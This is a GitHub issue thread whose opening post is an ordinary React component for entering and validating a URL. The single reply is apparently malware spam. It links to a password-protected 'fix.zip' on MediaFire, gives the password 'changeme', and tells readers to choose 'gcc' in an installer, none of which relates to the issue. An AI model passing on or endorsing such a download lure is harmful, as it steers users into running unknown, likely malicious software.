### ISSUE TITLE
Mini telegram app

### ISSUE THREAD

**Issue by Jabka25** [codesandbox/codesandbox-client#8560]
import React, { useState } from "react";

const UrlInput = ({ onUrlSubmit }) => {
  const [url, setUrl] = useState("");
  const [isValid, setIsValid] = useState(true);

  const handleChange = (e) => {
    setUrl(e.target.value);
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    const urlPattern = new RegExp(
      "^(https?:\\/\\/)" + // protocol
      "((([a-z\\d]([a-z\\d-]*[a-z\\d])*)\\.)+[a-z]{2,}|" + // domain name and extension
      "((\\d{1,3}\\.){3}\\d{1,3}))" + // OR ip (v4) address
      "(\\:\\d+)?(\\/[-a-z\\d%_.~+]*)*" + // port and path
      "(\\?[;&a-z\\d%_.~+=-]*)?" + // query string
      "(\\#[-a-z\\d_]*)?$",
      "i"
    );
    if (urlPattern.test(url)) {
      setIsValid(true);
      onUrlSubmit(url);
    } else {
      setIsValid(false);
    }
  };

  return (
    <div>
      <form onSubmit={handleSubmit}>
        <input
          type="text"
          value={url}
          onChange={handleChange}
          placeholder="Enter URL"
          className={isValid ? "" : "invalid"}
        />
        <button type="submit">Submit</button>
      </form>
      {!isValid && <p style={{ color: "red" }}>Please enter a valid URL</p>}
    </div>
  );
};

export default UrlInput;

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
